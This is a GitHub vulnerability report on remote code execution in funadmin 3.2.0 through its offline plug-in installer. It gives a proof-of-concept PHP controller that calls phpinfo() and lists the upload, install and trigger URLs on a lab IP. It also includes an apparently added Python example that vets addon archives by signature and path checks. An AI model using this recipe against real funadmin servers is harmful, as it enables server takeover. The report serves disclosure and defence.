Background offline installation plug-in rce #7

Closed
qbz95aaa opened this issue Jan 29, 2023 · 1 comment

Comments


qbz95aaa commented Jan 29, 2023

Vulnerability Product: funadmin
Vulnerability version: 3.2.0
Vulnerability type: remote code execution
Vulnerability Details:
Background offline installation plug-in RCE
Vulnerability location: app\backend\controller\Addon.php, where the plug-in installation does not filter malicious code.
Therefore, we can construct a malicious plug-in controller to cause remote code execution.
Construct the tarball.
snowflake\controller\Index.php executes the malicious code; here I call phpinfo():
```php
<?php

namespace addons\snowflake\controller;

use fun\addons\Controller;
use think\App;

class Index extends Controller
{
    // Home page: runs when /addons/snowflake is requested
    public function index()
    {
        phpinfo();

        echo hook_one('snowflake');
    }
}
```
After the compressed package has been constructed, upload the malicious package through the background: Plug-in → Plug-in management → Offline installation.
http://192.168.3.129:8092/backend/ajax/uploads?save=1&path=addon
http://192.168.3.129:8092/backend/addon/localinstall

After the installation succeeds, visit
http://192.168.3.129:8092/addons/snowflake
This successfully triggers our malicious code.

qbz95aaa (Author) commented

Found by Chaitin Security Research Lab
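As an added example, not code from this issue or from the funadmin project, the check below shows what an offline installer has to do before it extracts an uploaded package. It is written in Python as a stand-alone demonstration; the marketplace key, the HMAC tag format, the `vet_addon_archive` name and the file names are assumptions. Two points it makes: the controller from this issue is indistinguishable from a legitimate plug-in controller (a plug-in is arbitrary PHP by design), so scanning the source for "malicious code" cannot work and only a signature from the package's publisher separates the two; and even a signed archive is screened for zip-slip paths and symlinks so it can only write under addons/<name>/.

```python
"""Vetting an uploaded addon archive before it is extracted into addons/.

Added example, not funadmin code. It assumes a zip archive whose entries live
under <addon_name>/ and a marketplace that ships a signing tag with each
package; the HMAC key and the entry names are constructed for this example.
"""
import hashlib
import hmac
import io
import stat
import zipfile
from typing import Optional

# Hypothetical publisher key. A real deployment would use an asymmetric
# signature (e.g. Ed25519) so the installer only ever holds a public key.
MARKETPLACE_KEY = b"example-marketplace-signing-key"

# The controller from the issue, reproduced as the payload under test.
MALICIOUS_CONTROLLER = """<?php
namespace addons\\snowflake\\controller;
use fun\\addons\\Controller;
class Index extends Controller
{
    public function index()
    {
        phpinfo();
    }
}
"""


def build_addon(files: dict) -> bytes:
    """Build an in-memory zip from {entry_name: content}; constructed test data."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in files.items():
            zf.writestr(name, body)
    return buf.getvalue()


def sign_archive(archive: bytes) -> str:
    """Tag a trusted publisher would ship next to the archive (hex HMAC-SHA256)."""
    return hmac.new(MARKETPLACE_KEY, archive, hashlib.sha256).hexdigest()


def vet_addon_archive(archive: bytes, addon_name: str, tag: Optional[str]) -> list:
    """Return reasons to reject the upload; an empty list means it may be extracted.

    The controls are provenance (who signed the package) and containment (the
    archive may only write inside addons/<addon_name>/), not content scanning.
    """
    problems = []

    # 1. Provenance: refuse anything the marketplace did not sign. compare_digest
    #    avoids a timing side channel on the tag comparison.
    if tag is None or not hmac.compare_digest(sign_archive(archive), tag):
        problems.append("archive is not signed by the marketplace key")

    try:
        zf = zipfile.ZipFile(io.BytesIO(archive))
    except zipfile.BadZipFile:
        return problems + ["not a valid zip archive"]

    prefix = addon_name + "/"
    for info in zf.infolist():
        name = info.filename
        # 2. Zip-slip: absolute paths, backslashes and ".." segments let an entry
        #    land outside the addons directory (for example in public/).
        if name.startswith("/") or "\\" in name or ".." in name.split("/"):
            problems.append(f"path traversal in entry {name!r}")
            continue
        # 3. Containment: every entry must sit under the addon's own directory,
        #    so one plug-in cannot overwrite another plug-in or the core app.
        if not name.startswith(prefix):
            problems.append(f"entry {name!r} is outside {prefix}")
        # 4. Symlinks (unix mode lives in the high 16 bits of external_attr):
        #    a later entry could write through the link to anywhere on disk.
        if stat.S_ISLNK(info.external_attr >> 16):
            problems.append(f"symlink entry {name!r}")
    return problems


if __name__ == "__main__":
    payload = build_addon({"snowflake/controller/Index.php": MALICIOUS_CONTROLLER})
    print("unsigned upload:", vet_addon_archive(payload, "snowflake", None))
    print("signed upload:  ", vet_addon_archive(payload, "snowflake", sign_archive(payload)))
```

Run stand-alone, the unsigned upload of the issue's payload is rejected and the same bytes are accepted once the publisher's tag is present: the content did not change, only its provenance did. The traversal and containment checks are there for the case where the signing key or a publisher account is compromised; they bound the damage to the plug-in's own directory.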

@funadmin funadmin closed this as completed May 5, 2023